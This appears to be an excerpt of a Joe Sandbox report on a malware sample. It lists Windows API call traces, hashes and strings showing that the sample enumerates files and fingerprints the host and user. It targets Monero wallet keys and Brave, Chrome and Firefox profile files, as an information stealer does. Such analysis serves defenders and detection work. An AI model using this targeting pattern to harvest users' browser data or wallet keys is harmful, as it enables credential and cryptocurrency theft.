                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003B10B3
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003B10F7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                            • Instruction ID: a547e31f6553f2c8b07235ca2967542b870e2044e966d081930935346246b45d
                            • Opcode Fuzzy Hash: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                            • Instruction Fuzzy Hash: CAF0E2B1641208BBE714ABA4AC59FBAB7E8E705B15F300448F608E7280D572AF04DAA1
                            APIs
                              • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                              • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                              • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                              • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                              • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                              • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                            • ExitProcess.KERNEL32 ref: 003B11C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AllocateName$ComputerExitUser
                            • String ID:
                            • API String ID: 3550813701-0
                            • Opcode ID: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                            • Instruction ID: 1d806d81104ee076c3e1711b2f877e85126436ec45466310670021ab372e1ef5
                            • Opcode Fuzzy Hash: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                            • Instruction Fuzzy Hash: BDE0ECB991430152DA0173B5AC1BF2A339C5B24749F040428FF09DA502FA29ED04DA67
                            APIs
                            • wsprintfA.USER32 ref: 003C38CC
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C38E3
                            • lstrcat.KERNEL32(?,?), ref: 003C3935
                            • StrCmpCA.SHLWAPI(?,003D0F70), ref: 003C3947
                            • StrCmpCA.SHLWAPI(?,003D0F74), ref: 003C395D
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C3C67
                            • FindClose.KERNEL32(000000FF), ref: 003C3C7C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                            • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 1125553467-2524465048
                            • Opcode ID: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                            • Instruction ID: d100b5e6f64f0fc063cb9deafe4d031c21b507481f025fb29978c3ea73de79ce
                            • Opcode Fuzzy Hash: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                            • Instruction Fuzzy Hash: 3CA11FB29002189BDB25EB64DC85FFE7379BB58700F04858DE60DD6141EB759B88CF62
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,003D0B32,003D0B2B,00000000,?,?,?,003D13F4,003D0B2A), ref: 003BBEF5
                            • StrCmpCA.SHLWAPI(?,003D13F8), ref: 003BBF4D
                            • StrCmpCA.SHLWAPI(?,003D13FC), ref: 003BBF63
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BC7BF
                            • FindClose.KERNEL32(000000FF), ref: 003BC7D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 3334442632-726946144
                            • Opcode ID: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                            • Instruction ID: 6df49409570f79f787eab31721544b4a32ba33fc9a0099d665ab035fcd2a5e87
                            • Opcode Fuzzy Hash: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                            • Instruction Fuzzy Hash: E7424172910208ABCB16FBA0DD56FED737DAB94304F40455CB50ADA181EE34AF49CBA2
                            APIs
                            • wsprintfA.USER32 ref: 003C492C
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                            • StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                            • StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                            • FindClose.KERNEL32(000000FF), ref: 003C4B92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s$%s\%s$%s\*
                            • API String ID: 180737720-445461498
                            • Opcode ID: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                            • Instruction ID: eddd97862906906f075b95d25ca67f360c63fa4247b087b0f71bf903429f4ca7
                            • Opcode Fuzzy Hash: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                            • Instruction Fuzzy Hash: 446143B2900218ABCB25EBA0DC55FFA737CBB58700F04458DE64DD6141EB75AB49CFA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                            • wsprintfA.USER32 ref: 003C45A6
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                            • StrCmpCA.SHLWAPI(?,003D0FC4), ref: 003C45EB
                            • StrCmpCA.SHLWAPI(?,003D0FC8), ref: 003C4601
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C468B
                            • FindClose.KERNEL32(000000FF), ref: 003C46A0
                            • lstrcat.KERNEL32(?,0108E7E8), ref: 003C46C5
                            • lstrcat.KERNEL32(?,0108DA20), ref: 003C46D8
                            • lstrlen.KERNEL32(?), ref: 003C46E5
                            • lstrlen.KERNEL32(?), ref: 003C46F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                            • Instruction ID: da9fc257f4bdeeac3befd856386d896b1fbb3d644005a4b51e11fdc9cf03de30
                            • Opcode Fuzzy Hash: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                            • Instruction Fuzzy Hash: 0C5155B29002189BC725EB70DC99FF9737CAB58700F404589F60DD6150EB759B89CFA2
                            APIs
                            • wsprintfA.USER32 ref: 003C3EC3
                            • FindFirstFileA.KERNEL32(?,?), ref: 003C3EDA
                            • StrCmpCA.SHLWAPI(?,003D0FAC), ref: 003C3F08
                            • StrCmpCA.SHLWAPI(?,003D0FB0), ref: 003C3F1E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003C406C
                            • FindClose.KERNEL32(000000FF), ref: 003C4081
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                            • Instruction ID: 0ae97cde06227abe8a5e156c2689f9517c932902129a64a4dbd54c0765aa2c26
                            • Opcode Fuzzy Hash: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                            • Instruction Fuzzy Hash: 925101B2900218ABCB25EBA0DC45FFA737CBB58700F40458DB65DD6140EB75AB89DF52
                            APIs
                            • wsprintfA.USER32 ref: 003BED3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 003BED55
                            • StrCmpCA.SHLWAPI(?,003D1538), ref: 003BEDAB
                            • StrCmpCA.SHLWAPI(?,003D153C), ref: 003BEDC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BF2AE
                            • FindClose.KERNEL32(000000FF), ref: 003BF2C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                            • Instruction ID: e18af265c2f1ec67bab2880a0eacd616d4fe1e4fea6df826672053ea7d1ba6e4
                            • Opcode Fuzzy Hash: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                            • Instruction Fuzzy Hash: 8DE12D7281161C9BDB16EB60DC52FEE7738AF54304F40419DB50AAA092EF306F8ADF52
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D15B8,003D0D96), ref: 003BF71E
                            • StrCmpCA.SHLWAPI(?,003D15BC), ref: 003BF76F
                            • StrCmpCA.SHLWAPI(?,003D15C0), ref: 003BF785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BFAB1
                            • FindClose.KERNEL32(000000FF), ref: 003BFAC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                            • Instruction ID: 9b3ce9b5916bb5da73f4bc6c4d89b1e6ede926bbbecb6a168e0fc834dddccf87
                            • Opcode Fuzzy Hash: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                            • Instruction Fuzzy Hash: 2CB14E719006089BCB26EB60DC96FEE7779AF54304F4085ADA50ADA181EF306F49CF92
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D510C,?,?,?,003D51B4,?,?,00000000,?,00000000), ref: 003B1923
                            • StrCmpCA.SHLWAPI(?,003D525C), ref: 003B1973
                            • StrCmpCA.SHLWAPI(?,003D5304), ref: 003B1989
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003B1D40
                            • DeleteFileA.KERNEL32(00000000), ref: 003B1DCA
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003B1E20
                            • FindClose.KERNEL32(000000FF), ref: 003B1E32
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                            • Instruction ID: 7ea48e0572a445ec50f9ca73c0fe291525833055e0d230af46d4738ac5b1cf1b
                            • Opcode Fuzzy Hash: c2bb70d07bbc9d17438b48187ff79eafbe1f4ae75f6f7936575228da11740e48
                            • Instruction Fuzzy Hash: C612EE7191061C9BDB16EB60DC96FEE7778AF54304F40419DA10AEA091EF306F89DF92
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003D0C2E), ref: 003BDE5E
                            • StrCmpCA.SHLWAPI(?,003D14C8), ref: 003BDEAE
                            • StrCmpCA.SHLWAPI(?,003D14CC), ref: 003BDEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BE3E0
                            • FindClose.KERNEL32(000000FF), ref: 003BE3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                            • Instruction ID: a7e08904b4a463a82633a1d093aebe47f33c9bef258e4caeb95074b0ad303125
                            • Opcode Fuzzy Hash: 374e26a5d3b506e7683b6e735074abf2eed36ba0d87a9638a2854f8bc3d0ebb2
                            • Instruction Fuzzy Hash: ABF19E7181061C9BDB26EB60DC96FEE7778BF14304F80419EA50AA6091EF346F4ADF52
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                              • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                              • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                              • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01088F58,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                              • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                              • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                              • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D14B0,003D0C2A), ref: 003BDAEB
                            • StrCmpCA.SHLWAPI(?,003D14B4), ref: 003BDB33
                            • StrCmpCA.SHLWAPI(?,003D14B8), ref: 003BDB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 003BDDCC
                            • FindClose.KERNEL32(000000FF), ref: 003BDDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                            • Instruction ID: 8f44192cde8f0c59372748a14491a97c52430196df6c574d0fe639ab145f8337
                            • Opcode Fuzzy Hash: 86cace7791b372a25051bb73a751fe6802db339c7780d0e87aff07b2643d6853
                            • Instruction Fuzzy Hash: 5791237290060897CB16FBB0EC56EED777DAB94308F40855DF90ADA541EE349F09CB92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729779509.000000000060E000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000790000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000889000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.0000000000892000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729779509.00000000008A1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730050524.00000000008A2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730162551.0000000000A34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1730178781.0000000000A35000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Nx{$Qov[$W6}V$r}:${^Mx$'>~$*[$Ay$l=}
                            • API String ID: 0-3838544387
                            • Opcode ID: 72781a01f1004c8cebab541950271b35c0fc04298d2aff5e1775b34b999b647a
                            • Instruction ID: 6c69046b2185e78b5adae14c58bd97f6d4d26ea1258357dd05273de43e6c39f4
                            • Opcode Fuzzy Hash: 72781a01f1004c8cebab541950271b35c0fc04298d2aff5e1775b34b999b647a
                            • Instruction Fuzzy Hash: FCB206B36082149FE304AE2DDC8567AFBEAEFD4720F1A493DE6C4C3744EA3558058697
                            APIs
                              • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,003D05AF), ref: 003C7BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 003C7BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 003C7C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003C7C62
                            • LocalFree.KERNEL32(00000000), ref: 003C7D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1729604238.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                             • Associated: 00000000.00000002.1729580808.00000000003B0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000461000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1729604238.00000000005FA000.00000040.00000001.01000000.00000003.sdmp
